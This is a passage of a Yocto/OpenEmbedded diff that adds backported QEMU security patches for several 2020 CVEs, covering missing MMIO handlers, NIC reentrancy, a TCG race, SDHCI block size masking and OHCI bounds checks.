+ #include "hw/pci/pci_bridge.h"
+ #include "hw/pci/pci_host.h"
+@@ -63,6 +64,23 @@ designware_pcie_root_to_host(DesignwarePCIERoot *root)
+ return DESIGNWARE_PCIE_HOST(bus->parent);
+ }
+
++static uint64_t designware_pcie_root_msi_read(void *opaque, hwaddr addr,
++ unsigned size)
++{
++ /*
++ * Attempts to read from the MSI address are undefined in
++ * the PCI specifications. For this hardware, the datasheet
++ * specifies that a read from the magic address is simply not
++ * intercepted by the MSI controller, and will go out to the
++ * AHB/AXI bus like any other PCI-device-initiated DMA read.
++ * This is not trivial to implement in QEMU, so since
++ * well-behaved guests won't ever ask a PCI device to DMA from
++ * this address we just log the missing functionality.
++ */
++ qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
++ return 0;
++}
++
+ static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
+ uint64_t val, unsigned len)
+ {
+@@ -77,6 +95,7 @@ static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
+ }
+
+ static const MemoryRegionOps designware_pci_host_msi_ops = {
++ .read = designware_pcie_root_msi_read,
+ .write = designware_pcie_root_msi_write,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ .valid = {
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
new file mode 100644
index 0000000000..85abe8ff32
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
@@ -0,0 +1,49 @@
+From 24202d2b561c3b4c48bd28383c8c34b4ac66c2bf Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:27 +0530
+Subject: [PATCH] vfio: add quirk device write method
+
+Add vfio quirk device mmio write method to avoid NULL pointer
+dereference issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Acked-by: Alex Williamson <alex.williamson@redhat.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-4-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/24202d2b561c3b4c48bd28383c8c34b4ac66c2bf]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/vfio/pci-quirks.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/hw/vfio/pci-quirks.c
++++ b/hw/vfio/pci-quirks.c
+@@ -13,6 +13,7 @@
+ #include "qemu/osdep.h"
+ #include "exec/memop.h"
+ #include "qemu/units.h"
++#include "qemu/log.h"
+ #include "qemu/error-report.h"
+ #include "qemu/main-loop.h"
+ #include "qemu/module.h"
+@@ -278,8 +279,15 @@ static uint64_t vfio_ati_3c3_quirk_read(
+ return data;
+ }
+
++static void vfio_ati_3c3_quirk_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++}
++
+ static const MemoryRegionOps vfio_ati_3c3_quirk = {
+ .read = vfio_ati_3c3_quirk_read,
++ .write = vfio_ati_3c3_quirk_write,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
new file mode 100644
index 0000000000..52fac8a051
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
@@ -0,0 +1,53 @@
+From f867cebaedbc9c43189f102e4cdfdff05e88df7f Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:28 +0530
+Subject: [PATCH] prep: add ppc-parity write method
+
+Add ppc-parity mmio write method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Acked-by: David Gibson <david@gibson.dropbear.id.au>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-5-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/f867cebaedbc9c43189f102e4cdfdff05e88df7f]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/ppc/prep_systemio.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/ppc/prep_systemio.c b/hw/ppc/prep_systemio.c
+index 4e48ef2..b2bd783 100644
+--- a/hw/ppc/prep_systemio.c
++++ b/hw/ppc/prep_systemio.c
+@@ -23,6 +23,7 @@
+ */
+
+ #include "qemu/osdep.h"
++#include "qemu/log.h"
+ #include "hw/irq.h"
+ #include "hw/isa/isa.h"
+ #include "hw/qdev-properties.h"
+@@ -235,8 +236,15 @@ static uint64_t ppc_parity_error_readl(void *opaque, hwaddr addr,
+ return val;
+ }
+
++static void ppc_parity_error_writel(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++}
++
+ static const MemoryRegionOps ppc_parity_error_ops = {
+ .read = ppc_parity_error_readl,
++ .write = ppc_parity_error_writel,
+ .valid = {
+ .min_access_size = 4,
+ .max_access_size = 4,
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
new file mode 100644
index 0000000000..49c6c5e3e2
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
@@ -0,0 +1,53 @@
+From b5bf601f364e1a14ca4c3276f88dfec024acf613 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:29 +0530
+Subject: [PATCH] nvram: add nrf51_soc flash read method
+
+Add nrf51_soc mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-6-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b5bf601f364e1a14ca4c3276f88dfec024acf613 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/nvram/nrf51_nvm.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/hw/nvram/nrf51_nvm.c b/hw/nvram/nrf51_nvm.c
+index f2283c1..7b3460d 100644
+--- a/hw/nvram/nrf51_nvm.c
++++ b/hw/nvram/nrf51_nvm.c
+@@ -273,6 +273,15 @@ static const MemoryRegionOps io_ops = {
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
++static uint64_t flash_read(void *opaque, hwaddr offset, unsigned size)
++{
++ /*
++ * This is a rom_device MemoryRegion which is always in
++ * romd_mode (we never put it in MMIO mode), so reads always
++ * go directly to RAM and never come here.
++ */
++ g_assert_not_reached();
++}
+
+ static void flash_write(void *opaque, hwaddr offset, uint64_t value,
+ unsigned int size)
+@@ -300,6 +309,7 @@ static void flash_write(void *opaque, hwaddr offset, uint64_t value,
+
+
+ static const MemoryRegionOps flash_ops = {
++ .read = flash_read,
+ .write = flash_write,
+ .valid.min_access_size = 4,
+ .valid.max_access_size = 4,
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
new file mode 100644
index 0000000000..115be68295
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
@@ -0,0 +1,61 @@
+Backport of:
+
+From 921604e175b8ec06c39503310e7b3ec1e3eafe9e Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:30 +0530
+Subject: [PATCH] spapr_pci: add spapr msi read method
+
+Add spapr msi mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Acked-by: David Gibson <david@gibson.dropbear.id.au>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-7-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-6.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/921604e175b8ec06c39503310e7b3ec1e3eafe9e]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/ppc/spapr_pci.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+--- a/hw/ppc/spapr_pci.c
++++ b/hw/ppc/spapr_pci.c
+@@ -52,6 +52,7 @@
+ #include "sysemu/kvm.h"
+ #include "sysemu/hostmem.h"
+ #include "sysemu/numa.h"
++#include "qemu/log.h"
+
+ /* Copied from the kernel arch/powerpc/platforms/pseries/msi.c */
+ #define RTAS_QUERY_FN 0
+@@ -738,6 +739,12 @@ static PCIINTxRoute spapr_route_intx_pin
+ return route;
+ }
+
++static uint64_t spapr_msi_read(void *opaque, hwaddr addr, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++ return 0;
++}
++
+ /*
+ * MSI/MSIX memory region implementation.
+ * The handler handles both MSI and MSIX.
+@@ -755,8 +762,11 @@ static void spapr_msi_write(void *opaque
+ }
+
+ static const MemoryRegionOps spapr_msi_ops = {
+- /* There is no .read as the read result is undefined by PCI spec */
+- .read = NULL,
++ /*
++ * .read result is undefined by PCI spec.
++ * define .read method to avoid assert failure in memory_region_init_io
++ */
++ .read = spapr_msi_read,
+ .write = spapr_msi_write,
+ .endianness = DEVICE_LITTLE_ENDIAN
+ };
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
new file mode 100644
index 0000000000..7d8ec32251
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
@@ -0,0 +1,50 @@
+From 2c9fb3b784000c1df32231e1c2464bb2e3fc4620 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:31 +0530
+Subject: [PATCH] tz-ppc: add dummy read/write methods
+
+Add tz-ppc-dummy mmio read/write methods to avoid assert failure
+during initialisation.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-8-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-7.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/2c9fb3b784000c1df32231e1c2464bb2e3fc4620 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/misc/tz-ppc.c | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+
+diff --git a/hw/misc/tz-ppc.c b/hw/misc/tz-ppc.c
+index 6431257..36495c6 100644
+--- a/hw/misc/tz-ppc.c
++++ b/hw/misc/tz-ppc.c
+@@ -196,7 +196,21 @@ static bool tz_ppc_dummy_accepts(void *opaque, hwaddr addr,
+ g_assert_not_reached();
+ }
+
++static uint64_t tz_ppc_dummy_read(void *opaque, hwaddr addr, unsigned size)
++{
++ g_assert_not_reached();
++}
++
++static void tz_ppc_dummy_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ g_assert_not_reached();
++}
++
+ static const MemoryRegionOps tz_ppc_dummy_ops = {
++ /* define r/w methods to avoid assert failure in memory_region_init_io */
++ .read = tz_ppc_dummy_read,
++ .write = tz_ppc_dummy_write,
+ .valid.accepts = tz_ppc_dummy_accepts,
+ };
+
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
new file mode 100644
index 0000000000..7857ba266e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
@@ -0,0 +1,44 @@
+From 735754aaa15a6ed46db51fd731e88331c446ea54 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:32 +0530
+Subject: [PATCH] imx7-ccm: add digprog mmio write method
+
+Add digprog mmio write method to avoid assert failure during
+initialisation.
+
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-9-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-8.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/735754aaa15a6ed46db51fd731e88331c446ea54]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/misc/imx7_ccm.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/misc/imx7_ccm.c b/hw/misc/imx7_ccm.c
+index 02fc1ae..075159e 100644
+--- a/hw/misc/imx7_ccm.c
++++ b/hw/misc/imx7_ccm.c
+@@ -131,8 +131,16 @@ static const struct MemoryRegionOps imx7_set_clr_tog_ops = {
+ },
+ };
+
++static void imx7_digprog_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "Guest write to read-only ANALOG_DIGPROG register\n");
++}
++
+ static const struct MemoryRegionOps imx7_digprog_ops = {
+ .read = imx7_set_clr_tog_read,
++ .write = imx7_digprog_write,
+ .endianness = DEVICE_NATIVE_ENDIAN,
+ .impl = {
+ .min_access_size = 4,
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
new file mode 100644
index 0000000000..0f43adeea8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
@@ -0,0 +1,39 @@
+From 22dc8663d9fc7baa22100544c600b6285a63c7a3 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 22 Jul 2020 16:57:46 +0800
+Subject: [PATCH] net: forbid the reentrant RX
+
+The memory API allows DMA into NIC's MMIO area. This means the NIC's
+RX routine must be reentrant. Instead of auditing all the NIC, we can
+simply detect the reentrancy and return early. The queue->delivering
+is set and cleared by qemu_net_queue_deliver() for other queue helpers
+to know whether the delivering in on going (NIC's receive is being
+called). We can check it and return early in qemu_net_queue_flush() to
+forbid reentrant RX.
+
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+CVE: CVE-2020-15859
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/ubuntu/CVE-2020-15859.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/22dc8663d9fc7baa22100544c600b6285a63c7a3 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ net/queue.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/net/queue.c b/net/queue.c
+index 0164727..19e32c8 100644
+--- a/net/queue.c
++++ b/net/queue.c
+@@ -250,6 +250,9 @@ void qemu_net_queue_purge(NetQueue *queue, NetClientState *from)
+
+ bool qemu_net_queue_flush(NetQueue *queue)
+ {
++ if (queue->delivering)
++ return false;
++
+ while (!QTAILQ_EMPTY(&queue->packets)) {
+ NetPacket *packet;
+ int ret;
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
new file mode 100644
index 0000000000..e0a27331a8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
@@ -0,0 +1,94 @@
+CVE: CVE-2020-24165
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/886cc68943ebe8cf7e5f970be33459f95068a441 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 886cc68943ebe8cf7e5f970be33459f95068a441 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Alex=20Benn=C3=A9e?= <alex.bennee@linaro.org>
+Date: Fri, 14 Feb 2020 14:49:52 +0000
+Subject: [PATCH] accel/tcg: fix race in cpu_exec_step_atomic (bug 1863025)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The bug describes a race whereby cpu_exec_step_atomic can acquire a TB
+which is invalidated by a tb_flush before we execute it. This doesn't
+affect the other cpu_exec modes as a tb_flush by it's nature can only
+occur on a quiescent system. The race was described as:
+
+ B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
+ B3. tcg_tb_alloc obtains a new TB
+
+ C3. TB obtained with tb_lookup__cpu_state or tb_gen_code
+ (same TB as B2)
+
+ A3. start_exclusive critical section entered
+ A4. do_tb_flush is called, TB memory freed/re-allocated
+ A5. end_exclusive exits critical section
+
+ B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
+ B3. tcg_tb_alloc reallocates TB from B2
+
+ C4. start_exclusive critical section entered
+ C5. cpu_tb_exec executes the TB code that was free in A4
+
+The simplest fix is to widen the exclusive period to include the TB
+lookup. As a result we can drop the complication of checking we are in
+the exclusive region before we end it.
+
+Cc: Yifan <me@yifanlu.com>
+Buglink: https://bugs.launchpad.net/qemu/+bug/1863025
+Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
+Reviewed-by: Richard Henderson <richard.henderson@linaro.org>
+Signed-off-by: Alex Bennée <alex.bennee@linaro.org>
+Message-Id: <20200214144952.15502-1-alex.bennee@linaro.org>
+Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
+---
+ accel/tcg/cpu-exec.c | 21 +++++++++++----------
+ 1 file changed, 11 insertions(+), 10 deletions(-)
+
+diff --git a/accel/tcg/cpu-exec.c b/accel/tcg/cpu-exec.c
+index 2560c90eec79..d95c4848a47b 100644
+--- a/accel/tcg/cpu-exec.c
++++ b/accel/tcg/cpu-exec.c
+@@ -240,6 +240,8 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ uint32_t cf_mask = cflags & CF_HASH_MASK;
+
+ if (sigsetjmp(cpu->jmp_env, 0) == 0) {
++ start_exclusive();
++
+ tb = tb_lookup__cpu_state(cpu, &pc, &cs_base, &flags, cf_mask);
+ if (tb == NULL) {
+ mmap_lock();
+@@ -247,8 +249,6 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ mmap_unlock();
+ }
+
+- start_exclusive();
+-
+ /* Since we got here, we know that parallel_cpus must be true. */
+ parallel_cpus = false;
+ cc->cpu_exec_enter(cpu);
+@@ -271,14 +271,15 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ qemu_plugin_disable_mem_helpers(cpu);
+ }
+
+- if (cpu_in_exclusive_context(cpu)) {
+- /* We might longjump out of either the codegen or the
+- * execution, so must make sure we only end the exclusive
+- * region if we started it.
+- */
+- parallel_cpus = true;
+- end_exclusive();
+- }
++
++ /*
++ * As we start the exclusive region before codegen we must still
++ * be in the region if we longjump out of either the codegen or
++ * the execution.
++ */
++ g_assert(cpu_in_exclusive_context(cpu));
++ parallel_cpus = true;
++ end_exclusive();
+ }
+
+ struct tb_desc {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
new file mode 100644
index 0000000000..be19256cef
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
@@ -0,0 +1,46 @@
+From dfba99f17feb6d4a129da19d38df1bcd8579d1c3 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 1 Sep 2020 15:22:06 +0200
+Subject: [PATCH] hw/sd/sdhci: Fix DMA Transfer Block Size field
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The 'Transfer Block Size' field is 12-bit wide.
+
+See section '2.2.2. Block Size Register (Offset 004h)' in datasheet.
+
+Two different bug reproducer available:
+- https://bugs.launchpad.net/qemu/+bug/1892960
+- https://ruhr-uni-bochum.sciebo.de/s/NNWP2GfwzYKeKwE?path=%2Fsdhci_oob_write1
+
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Fixes: d7dfca0807a ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20200901140411.112150-3-f4bug@amsat.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25085
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/sd/sdhci.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/sd/sdhci.c
+===================================================================
+--- qemu-4.2.0.orig/hw/sd/sdhci.c
++++ qemu-4.2.0/hw/sd/sdhci.c
+@@ -1129,7 +1129,7 @@ sdhci_write(void *opaque, hwaddr offset,
+ break;
+ case SDHC_BLKSIZE:
+ if (!TRANSFERRING_DATA(s->prnsts)) {
+- MASKED_WRITE(s->blksize, mask, value);
++ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+ }
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
new file mode 100644
index 0000000000..a46b5be193
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
@@ -0,0 +1,87 @@
+From fbec359e9279ce78908b9f2af2c264e7448336af Mon Sep 17 00:00:00 2001
+From: Guenter Roeck <linux@roeck-us.net>
+Date: Mon, 17 Feb 2020 12:48:10 -0800
+Subject: [PATCH] hw: usb: hcd-ohci: Move OHCISysBusState and TYPE_SYSBUS_OHCI
+ to include file
+
+We need to be able to use OHCISysBusState outside hcd-ohci.c, so move it
+to its include file.
+
+Reviewed-by: Gerd Hoffmann <kraxel@redhat.com>
+Signed-off-by: Guenter Roeck <linux@roeck-us.net>
+Tested-by: Niek Linnenbank <nieklinnenbank@gmail.com>
+Message-id: 20200217204812.9857-2-linux@roeck-us.net
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25624 patch #1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 15 ---------------
+ hw/usb/hcd-ohci.h | 16 ++++++++++++++++
+ 2 files changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 8a94bd004a..1e6e85e86a 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -1870,21 +1870,6 @@ void ohci_sysbus_die(struct OHCIState *ohci)
+ ohci_bus_stop(ohci);
+ }
+
+-#define TYPE_SYSBUS_OHCI "sysbus-ohci"
+-#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
+-
+-typedef struct {
+- /*< private >*/
+- SysBusDevice parent_obj;
+- /*< public >*/
+-
+- OHCIState ohci;
+- char *masterbus;
+- uint32_t num_ports;
+- uint32_t firstport;
+- dma_addr_t dma_offset;
+-} OHCISysBusState;
+-
+ static void ohci_realize_pxa(DeviceState *dev, Error **errp)
+ {
+ OHCISysBusState *s = SYSBUS_OHCI(dev);
+diff --git a/hw/usb/hcd-ohci.h b/hw/usb/hcd-ohci.h
+index 16e3f1e13a..5c8819aedf 100644
+--- a/hw/usb/hcd-ohci.h
++++ b/hw/usb/hcd-ohci.h
+@@ -22,6 +22,7 @@
+ #define HCD_OHCI_H
+
+ #include "sysemu/dma.h"
++#include "hw/usb.h"
+
+ /* Number of Downstream Ports on the root hub: */
+ #define OHCI_MAX_PORTS 15
+@@ -90,6 +91,21 @@ typedef struct OHCIState {
+ void (*ohci_die)(struct OHCIState *ohci);
+ } OHCIState;
+
++#define TYPE_SYSBUS_OHCI "sysbus-ohci"
++#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
++
++typedef struct {
++ /*< private >*/
++ SysBusDevice parent_obj;
++ /*< public >*/
++
++ OHCIState ohci;
++ char *masterbus;
++ uint32_t num_ports;
++ uint32_t firstport;
++ dma_addr_t dma_offset;
++} OHCISysBusState;
++
+ extern const VMStateDescription vmstate_ohci_state;
+
+ void usb_ohci_init(OHCIState *ohci, DeviceState *dev, uint32_t num_ports,
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
new file mode 100644
index 0000000000..8c1275b2f4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
@@ -0,0 +1,101 @@
+From 1328fe0c32d5474604105b8105310e944976b058 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 15 Sep 2020 23:52:58 +0530
+Subject: [PATCH] hw: usb: hcd-ohci: check len and frame_number variables
+
+While servicing the OHCI transfer descriptors(TD), OHCI host
+controller derives variables 'start_addr', 'end_addr', 'len'
+etc. from values supplied by the host controller driver.
+Host controller driver may supply values such that using
+above variables leads to out-of-bounds access issues.
+Add checks to avoid them.
+
+AddressSanitizer: stack-buffer-overflow on address 0x7ffd53af76a0
+ READ of size 2 at 0x7ffd53af76a0 thread T0
+ #0 ohci_service_iso_td ../hw/usb/hcd-ohci.c:734
+ #1 ohci_service_ed_list ../hw/usb/hcd-ohci.c:1180
+ #2 ohci_process_lists ../hw/usb/hcd-ohci.c:1214
+ #3 ohci_frame_boundary ../hw/usb/hcd-ohci.c:1257
+ #4 timerlist_run_timers ../util/qemu-timer.c:572
+ #5 qemu_clock_run_timers ../util/qemu-timer.c:586
+ #6 qemu_clock_run_all_timers ../util/qemu-timer.c:672
+ #7 main_loop_wait ../util/main-loop.c:527
+ #8 qemu_main_loop ../softmmu/vl.c:1676
+ #9 main ../softmmu/main.c:50
+
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Reported-by: Yongkang Jia <j_kangel@163.com>
+Reported-by: Yi Ren <yunye.ry@alibaba-inc.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-id: 20200915182259.68522-2-ppandit@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25624 patch #2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 24 ++++++++++++++++++++++--
+ 1 file changed, 22 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 1e6e85e86a..9dc59101f9 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -731,7 +731,11 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ }
+
+ start_offset = iso_td.offset[relative_frame_number];
+- next_offset = iso_td.offset[relative_frame_number + 1];
++ if (relative_frame_number < frame_count) {
++ next_offset = iso_td.offset[relative_frame_number + 1];
++ } else {
++ next_offset = iso_td.be;
++ }
+
+ if (!(OHCI_BM(start_offset, TD_PSW_CC) & 0xe) ||
+ ((relative_frame_number < frame_count) &&
